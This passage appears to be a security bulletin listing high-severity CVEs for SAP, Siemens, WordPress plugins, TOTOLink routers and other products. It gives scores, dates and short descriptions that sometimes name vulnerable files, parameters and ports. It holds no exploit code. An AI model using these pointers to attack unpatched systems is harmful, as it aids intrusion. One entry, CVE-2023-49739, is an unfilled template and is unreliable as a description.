sap — commerce_cloud In SAP Commerce Cloud – versions HY_COM 1905, HY_COM 2005, HY_COM2105, HY_COM 2011, HY_COM 2205, COM_CLOUD 2211, a locked B2B user can misuse the forgotten password functionality to un-block his user account again and re-gain access if SAP Commerce Cloud – Composable Storefront is used as storefront, due to weak access controls in place. This leads to a considerable impact on confidentiality and integrity. 2023-12-12 8.1 CVE-2023-42481
cna@sap.com
sap — sap-xssec SAP BTP Security Services Integration Library ([Python] sap-xssec) – versions < 4.1.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application. 2023-12-12 9.8 CVE-2023-50423
cna@sap.com
sap_se — multiple_products SAP GUI for Windows and SAP GUI for Java – versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. also increasing the response times of the AS ABAP. 2023-12-12 7.3 CVE-2023-49580
cna@sap.com
sap_se — sap_emarsys_sdk_android Due to lack of proper authorization checks in Emarsys SDK for Android, an attacker can call a particular activity and can forward himself web pages and/or deep links without any validation directly from the host application. On successful attack, an attacker could navigate to arbitrary URL including application deep links on the device. 2023-12-12 7.1 CVE-2023-6542
cna@sap.com
schneider_electric — trio_q-series_ethernet_data_radio A CWE-601:URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability exists that could cause disclosure of information through phishing attempts over HTTP. 2023-12-14 8.2 CVE-2023-5629
cybersecurity@se.com
searchor — searchor main.py in Searchor before 2.4.2 uses eval on CLI input, which may cause unexpected code execution. 2023-12-12 9.8 CVE-2023-43364
cve@mitre.org
sensormatic_electronics — iosmart An attacker with physical access to the Kantech Gen1 ioSmart card reader with firmware version prior to 1.07.02 in certain circumstances can recover the reader’s communication memory between the card and reader. 2023-12-14 7.5 CVE-2023-0248
productsecurity@jci.com
seraphinite_solutions — seraphinite_accelerator Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Seraphinite Solutions Seraphinite Accelerator allows Reflected XSS. This issue affects Seraphinite Accelerator: from n/a through 2.20.28. 2023-12-14 7.1 CVE-2023-49740
audit@patchstack.com
siemens — logo! A vulnerability has been identified in LOGO! 12/24RCE (All versions >= V8.3), LOGO! 12/24RCEo (All versions >= V8.3), LOGO! 230RCE (All versions >= V8.3), LOGO! 230RCEo (All versions >= V8.3), LOGO! 24CE (All versions >= V8.3), LOGO! 24CEo (All versions >= V8.3), LOGO! 24RCE (All versions >= V8.3), LOGO! 24RCEo (All versions >= V8.3), SIPLUS LOGO! 12/24RCE (All versions >= V8.3), SIPLUS LOGO! 12/24RCEo (All versions >= V8.3), SIPLUS LOGO! 230RCE (All versions >= V8.3), SIPLUS LOGO! 230RCEo (All versions >= V8.3), SIPLUS LOGO! 24CE (All versions >= V8.3), SIPLUS LOGO! 24CEo (All versions >= V8.3), SIPLUS LOGO! 24RCE (All versions >= V8.3), SIPLUS LOGO! 24RCEo (All versions >= V8.3). Affected devices are vulnerable to an electromagnetic fault injection. This could allow an attacker to dump and debug the firmware, including the manipulation of memory. Further actions could allow to inject public keys of custom created key pairs which are then signed by the product CA. The generation of a custom certificate allows communication with, and impersonation of, any device of the same version. 2023-12-12 7.6 CVE-2022-42784
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in SIMATIC PC-Station Plus (All versions), SIMATIC S7-400 CPU 412-2 PN V7 (All versions), SIMATIC S7-400 CPU 414-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 414F-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416F-3 PN/DP V7 (All versions), SINAMICS S120 (incl. SIPLUS variants) (All versions < V5.2 SP3 HF15), SIPLUS S7-400 CPU 414-3 PN/DP V7 (All versions), SIPLUS S7-400 CPU 416-3 PN/DP V7 (All versions). The affected products do not handle HTTP(S) requests to the web server correctly. This could allow an attacker to exhaust system resources and create a denial of service condition for the device. 2023-12-12 7.5 CVE-2022-47374
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in SIMATIC PC-Station Plus (All versions), SIMATIC S7-400 CPU 412-2 PN V7 (All versions), SIMATIC S7-400 CPU 414-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 414F-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416F-3 PN/DP V7 (All versions), SINAMICS S120 (incl. SIPLUS variants) (All versions < V5.2 SP3 HF15), SIPLUS S7-400 CPU 414-3 PN/DP V7 (All versions), SIPLUS S7-400 CPU 416-3 PN/DP V7 (All versions). The affected products do not handle long file names correctly. This could allow an attacker to create a buffer overflow and create a denial of service condition for the device. 2023-12-12 7.5 CVE-2022-47375
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in SIMATIC CP 1242-7 V2 (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-1 (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-1 DNP3 (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-1 IEC (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-7 LTE (All versions), SIMATIC CP 1243-8 IRC (All versions), SIMATIC CP 1543-1 (All versions), SINAMICS S210 (6SL5…) (All versions >= V6.1 < V6.1 HF2), SIPLUS NET CP 1543-1 (All versions). The webserver implementation of the affected products does not correctly release allocated memory after it has been used. An attacker with network access could use this vulnerability to cause a denial-of-service condition in the webserver of the affected product. 2023-12-12 7.5 CVE-2023-38380
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). The affected application contains an out of bounds write past the end of an allocated buffer when handling specific requests on port 4002/tcp. This could allow an attacker to crash the application. The corresponding service is auto-restarted after the crash. 2023-12-12 7.5 CVE-2023-46283
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). The affected application contains an out of bounds write past the end of an allocated buffer when handling specific requests on port 4002/tcp and 4004/tcp. This could allow an attacker to crash the application. The corresponding service is auto-restarted after the crash. 2023-12-12 7.5 CVE-2023-46284
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). The affected application contains an improper input validation vulnerability that could allow an attacker to bring the service into a Denial-of-Service state by sending a specifically crafted message to 4004/tcp. The corresponding service is auto-restarted after the crash is detected by a watchdog. 2023-12-12 7.5 CVE-2023-46285
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions < V8.0), RUGGEDCOM RM1224 LTE(4G) NAM (All versions < V8.0), SCALANCE M804PB (All versions < V8.0), SCALANCE M812-1 ADSL-Router (Annex A) (All versions < V8.0), SCALANCE M812-1 ADSL-Router (Annex B) (All versions < V8.0), SCALANCE M816-1 ADSL-Router (Annex A) (All versions < V8.0), SCALANCE M816-1 ADSL-Router (Annex B) (All versions < V8.0), SCALANCE M826-2 SHDSL-Router (All versions < V8.0), SCALANCE M874-2 (All versions < V8.0), SCALANCE M874-3 (All versions < V8.0), SCALANCE M876-3 (EVDO) (All versions < V8.0), SCALANCE M876-3 (ROK) (All versions < V8.0), SCALANCE M876-4 (All versions < V8.0), SCALANCE M876-4 (EU) (All versions < V8.0), SCALANCE M876-4 (NAM) (All versions < V8.0), SCALANCE MUM853-1 (EU) (All versions < V8.0), SCALANCE MUM856-1 (EU) (All versions < V8.0), SCALANCE MUM856-1 (RoW) (All versions < V8.0), SCALANCE S615 (All versions < V8.0), SCALANCE S615 EEC (All versions < V8.0). An Improper Neutralization of Special Elements used in an OS Command with root privileges vulnerability exists in the handling of the DDNS configuration. This could allow malicious local administrators to issue commands on system level after a successful IP address update. 2023-12-12 7.2 CVE-2023-49691
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions < V7.2.2), RUGGEDCOM RM1224 LTE(4G) NAM (All versions < V7.2.2), SCALANCE M804PB (All versions < V7.2.2), SCALANCE M812-1 ADSL-Router (Annex A) (All versions < V7.2.2), SCALANCE M812-1 ADSL-Router (Annex B) (All versions < V7.2.2), SCALANCE M816-1 ADSL-Router (Annex A) (All versions < V7.2.2), SCALANCE M816-1 ADSL-Router (Annex B) (All versions < V7.2.2), SCALANCE M826-2 SHDSL-Router (All versions < V7.2.2), SCALANCE M874-2 (All versions < V7.2.2), SCALANCE M874-3 (All versions < V7.2.2), SCALANCE M876-3 (EVDO) (All versions < V7.2.2), SCALANCE M876-3 (ROK) (All versions < V7.2.2), SCALANCE M876-4 (All versions < V7.2.2), SCALANCE M876-4 (EU) (All versions < V7.2.2), SCALANCE M876-4 (NAM) (All versions < V7.2.2), SCALANCE MUM853-1 (EU) (All versions < V7.2.2), SCALANCE MUM856-1 (EU) (All versions < V7.2.2), SCALANCE MUM856-1 (RoW) (All versions < V7.2.2), SCALANCE S615 (All versions < V7.2.2), SCALANCE S615 EEC (All versions < V7.2.2). An Improper Neutralization of Special Elements used in an OS Command with root privileges vulnerability exists in the parsing of the IPSEC configuration. This could allow malicious local administrators to issue commands on system level after a new connection is established. 2023-12-12 7.2 CVE-2023-49692
productcert@siemens.com
siemens — opcenter_quality A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). When accessing the UMC Web-UI from affected products, UMC uses an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior. 2023-12-12 8.8 CVE-2023-46281
productcert@siemens.com
siemens — simatic_drive_controller_cpu_1504d_tf Affected devices improperly handle specially crafted packets sent to port 102/tcp. This could allow an attacker to create a denial of service condition. A restart is needed to restore normal operations. 2023-12-12 7.5 CVE-2023-46156
productcert@siemens.com
siemens — sinec_ins A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). Affected products do not properly validate the certificate of the configured UMC server. This could allow an attacker to intercept credentials that are sent to the UMC server as well as to manipulate responses, potentially allowing an attacker to escalate privileges. 2023-12-12 9.8 CVE-2023-48427
productcert@siemens.com
siemens — sinec_ins A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). Affected software does not correctly validate the response received by an UMC server. An attacker can use this to crash the affected software by providing and configuring a malicious UMC server or by manipulating the traffic from a legitimate UMC server (i.e. leveraging CVE-2023-48427). 2023-12-12 8.6 CVE-2023-48431
productcert@siemens.com
siemens — sinec_ins A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The radius configuration mechanism of affected products does not correctly check uploaded certificates. A malicious admin could upload a crafted certificate resulting in a denial-of-service condition or potentially issue commands on system level. 2023-12-12 7.2 CVE-2023-48428
productcert@siemens.com
silabs — gsdk An unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory. 2023-12-15 9 CVE-2023-4020
product-security@silabs.com
silverpeas — silverpeas Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control. An attacker with low privileges is able to execute the administrator-only function of putting the application in “Maintenance Mode” due to broken access control. This makes the application unavailable to all users. This affects Silverpeas Core 6.3.1 and below. 2023-12-13 8.1 CVE-2023-47320
cve@mitre.org
silverpeas — silverpeas The “userModify” feature of Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. If an administrator goes to a malicious URL while being authenticated to the Silverpeas application, the CSRF will execute, making the attacker an administrator user in the application. 2023-12-13 8.8 CVE-2023-47322
cve@mitre.org
silverpeas — silverpeas The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between other users; including those sent only to administrators. 2023-12-13 7.5 CVE-2023-47323
cve@mitre.org
smartstar_software — cws_web-base SmartStar Software CWS is a web-based integration platform, its file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service. 2023-12-15 9.8 CVE-2023-48376
twcert@cert.org.tw
smartstar_software — cws_web-base SmartStar Software CWS is a web-based integration platform. It has a missing authorization vulnerability, and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated user with normal user privilege can act with administrator privilege, resulting in performing arbitrary system operations or disrupting service. 2023-12-15 8.8 CVE-2023-48375
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48378
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform. It has insufficient filtering for a special character within a specific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service. 2023-12-15 7.4 CVE-2023-48380
twcert@cert.org.tw
sourcecodester — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been classified as critical. Affected is an unknown function of the file attendance.php. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247254 is the identifier assigned to this vulnerability. 2023-12-08 9.8 CVE-2023-6617
cna@vuldb.com
sourcecodester — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /modals/class_form.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247256. 2023-12-08 9.8 CVE-2023-6619
cna@vuldb.com
sourcecodester — simple_student_attendance_system A vulnerability classified as critical was found in SourceCodester Simple Student Attendance System 1.0. This vulnerability affects unknown code of the file ajax-api.php?action=save_attendance. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247366 is the identifier assigned to this vulnerability. 2023-12-10 9.8 CVE-2023-6658
cna@vuldb.com
sourcecodester — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument page leads to file inclusion. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247255. 2023-12-08 8.8 CVE-2023-6618
cna@vuldb.com
sourcecodester — simple_student_attendance_system A vulnerability classified as critical has been found in SourceCodester Simple Student Attendance System 1.0. This affects an unknown part of the file /modals/student_form.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-247365 was assigned to this vulnerability. 2023-12-10 9.8 CVE-2023-6657
cna@vuldb.com
squid — squid Squid is a caching proxy for the Web. Due to an Uncontrolled Recursion bug in versions 2.6 through 2.7.STABLE9, versions 3.1 through 5.9, and versions 6.0.1 through 6.5, Squid may be vulnerable to a Denial of Service attack against HTTP Request parsing. This problem allows a remote client to perform Denial of Service attack by sending a large X-Forwarded-For header when the follow_x_forwarded_for feature is configured. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid’s patch archives. 2023-12-14 8.6 CVE-2023-50269
security-advisories@github.com
suse — rancher In Rancher 2.x before 2.6.13 and 2.7.x before 2.7.4, an incorrectly applied authorization check allows users who have certain access to a namespace to move that namespace to a different project. 2023-12-12 8.8 CVE-2020-10676
cve@mitre.org
thecosy — icecms A vulnerability was found in Thecosy IceCMS 2.0.1. It has been classified as problematic. Affected is an unknown function of the file /login of the component Captcha Handler. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247884. 2023-12-13 9.8 CVE-2023-6756
cna@vuldb.com
thecosy — icecms A vulnerability, which was classified as problematic, has been found in Thecosy IceCMS up to 2.0.1. This issue affects some unknown processing of the component User Data Handler. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247889 was assigned to this vulnerability. 2023-12-13 8.8 CVE-2023-6761
cna@vuldb.com
thecosy — icecms A vulnerability classified as problematic has been found in Thecosy IceCMS 2.0.1. This affects an unknown part of the file /WebResource/resource of the component Love Handler. The manipulation leads to improper enforcement of a single, unique action. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247887. 2023-12-13 7.5 CVE-2023-6759
cna@vuldb.com
tongda2000 — tongda_oa A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this issue is some unknown functionality of the file general/notify/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-247244. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 7.5 CVE-2023-6608
cna@vuldb.com
tongda2000 — tongda_oa A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. This vulnerability affects unknown code of the file pda/pad/email/delete.php. The manipulation of the argument EMAIL_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-247246 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 7.5 CVE-2023-6611
cna@vuldb.com
tongda — tongda_office_anywhere A vulnerability has been found in Tongda OA 2017 up to 11.10 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/wiki/cp/manage/delete.php. The manipulation of the argument TERM_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247243. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 7.5 CVE-2023-6607
cna@vuldb.com
totolink — a7000r_firmware TOTOLink A7000R V9.1.0u.6115_B20201022 has a stack overflow vulnerability via setOpModeCfg. 2023-12-11 9.8 CVE-2023-49417
cve@mitre.org
totolink — a7000r_firmware TOTOLink A7000R V9.1.0u.6115_B20201022 has a stack overflow vulnerability via setIpPortFilterRules. 2023-12-11 9.8 CVE-2023-49418
cve@mitre.org
totolink — x5000r_firmware A vulnerability was found in Totolink X5000R 9.1.0cu.2300_B20230112. It has been rated as critical. This issue affects the function setDdnsCfg/setDynamicRoute/setFirewallType/setIPSecCfg/setIpPortFilterRules/setLancfg/setLoginPasswordCfg/setMacFilterRules/setMtknatCfg/setNetworkConfig/setPortForwardRules/setRemoteCfg/setSSServer/setScheduleCfg/setSmartQosCfg/setStaticDhcpRules/setStaticRoute/setVpnAccountCfg/setVpnPassCfg/setVpnUser/setWiFiAclAddConfig/setWiFiEasyGuestCfg/setWiFiGuestCfg/setWiFiRepeaterConfig/setWiFiScheduleCfg/setWizardCfg of the file /cgi-bin/cstecgi.cgi. The manipulation leads to os command injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247247. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 9.8 CVE-2023-6612
cna@vuldb.com
tutao — tutanota Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victim’s computer; however, it fails to check other harmful schemes such as `ftp:`, `smb:`, etc., which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim’s computer. Version 3.118.2 contains a patch for this issue. 2023-12-15 9.3 CVE-2023-46116
security-advisories@github.com
undertow — undertow A flaw was found in Undertow. When an AJP request is sent that exceeds the max-header-size attribute in ajp-listener, JBoss EAP is marked in an error state by mod_cluster in httpd, causing JBoss EAP to close the TCP connection without returning an AJP response. This happens because mod_proxy_cluster marks the JBoss EAP instance as an error worker when the TCP connection is closed from the backend after sending the AJP request without receiving an AJP response, and stops forwarding. This issue could allow a malicious user to repeatedly send requests that exceed the max-header-size, causing a Denial of Service (DoS). 2023-12-12 7.5 CVE-2023-5379
secalert@redhat.com
vyperlang — vyper Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine (EVM). Contracts containing large arrays might underallocate the number of slots they need by 1. Prior to v0.3.8, the calculation to determine how many slots a storage variable needed used `math.ceil(type_.size_in_bytes / 32)`. The intermediate floating point step can produce a rounding error if there are enough bits set in the IEEE-754 mantissa. Roughly speaking, if `type_.size_in_bytes` is large (> 2**46), and slightly less than a power of 2, the calculation can overestimate how many slots are needed by 1. If `type_.size_in_bytes` is slightly more than a power of 2, the calculation can underestimate how many slots are needed by 1. This issue is patched in version 0.3.8. 2023-12-13 7.5 CVE-2023-46247
security-advisories@github.com
wordpress — wordpress The Digital Publications by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.6. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to execute AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2023-12-09 8.8 CVE-2023-5756
security@wordfence.com
wordpress — wordpress The EazyDocs WordPress plugin before 2.3.4 does not properly sanitize and escape “data” parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks. 2023-12-11 8.8 CVE-2023-6035
contact@wpscan.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Bruno “Aesqe” Babic File Gallery allows Reflected XSS. This issue affects File Gallery: from n/a through 1.8.5.4. 2023-12-14 7.1 CVE-2023-48771
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in captainform Forms by CaptainForm – Form Builder for WordPress allows Reflected XSS. This issue affects Forms by CaptainForm – Form Builder for WordPress: from n/a through 2.5.3. 2023-12-15 7.1 CVE-2023-49170
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in TheInnovs Innovs HR – Complete Human Resource Management System for Your Business allows Reflected XSS. This issue affects Innovs HR – Complete Human Resource Management System for Your Business: from n/a through 1.0.3.4. 2023-12-14 7.1 CVE-2023-49171
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in BrainCert BrainCert – HTML5 Virtual Classroom allows Reflected XSS. This issue affects BrainCert – HTML5 Virtual Classroom: from n/a through 1.30. 2023-12-14 7.1 CVE-2023-49172
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS. This issue affects WP Pocket URLs: from n/a through 1.0.2. 2023-12-15 7.1 CVE-2023-49176
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Gilles Dumas which template file allows Reflected XSS. This issue affects which template file: from n/a through 4.9.0. 2023-12-15 7.1 CVE-2023-49177
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS. This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0. 2023-12-15 7.1 CVE-2023-49178
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS. This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10. 2023-12-15 7.1 CVE-2023-49182
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS. This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2. 2023-12-15 7.1 CVE-2023-49183
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS. This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7. 2023-12-15 7.1 CVE-2023-49185
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Spoonthemes Adifier – Classified Ads WordPress Theme allows Reflected XSS. This issue affects Adifier – Classified Ads WordPress Theme: from n/a before 3.1.4. 2023-12-15 7.1 CVE-2023-49187
audit@patchstack.com
wordpress — wordpress [PROBLEMTYPE] in [COMPONENT] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT] via [VECTOR] 2023-12-14 7.1 CVE-2023-49739
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themefic Ultimate Addons for Contact Form 7 allows Stored XSS. This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.2.0. 2023-12-14 7.1 CVE-2023-49766
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Peter Raschendorfer Smart External Link Click Monitor [Link Log] allows Reflected XSS. This issue affects Smart External Link Click Monitor [Link Log]: from n/a through 5.0.2. 2023-12-14 7.1 CVE-2023-49771
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus allows Stored XSS. This issue affects WP Photo Album Plus: from n/a through 8.5.02.005. 2023-12-14 7.1 CVE-2023-49813
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme allows Reflected XSS. This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1. 2023-12-14 7.1 CVE-2023-49827
audit@patchstack.com
wordpress — wordpress The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. 2023-12-16 7.5 CVE-2023-6559
security@wordfence.com
wordpress — wordpress The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘import_action’ function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site’s server which may make remote code execution possible. 2023-12-15 7.2 CVE-2023-6826
security@wordfence.com
wordpress — wordpress The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘ajaxUploadFonts’ function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site’s server which may make remote code execution possible. 2023-12-15 7.5 CVE-2023-6827
security@wordfence.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server. 2023-12-15 9.8 CVE-2023-6553
security@wordfence.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Aleksandar Urošević Stock Ticker allows Reflected XSS. This issue affects Stock Ticker: from n/a through 3.23.2. 2023-12-14 7.1 CVE-2022-45365
audit@patchstack.com
wso2 — wso2_api_manager Multiple WSO2 products have been identified as vulnerable to perform user impersonation using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the “Prompt for username, password and consent” option. * A service provider that uses the above IDP for federated authentication and has the “Assert identity using mapped local subject identifier” flag enabled. Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation. 2023-12-15 8.5 CVE-2023-6837
ed10eef1-636d-4fbe-9993-6890dfa878f8
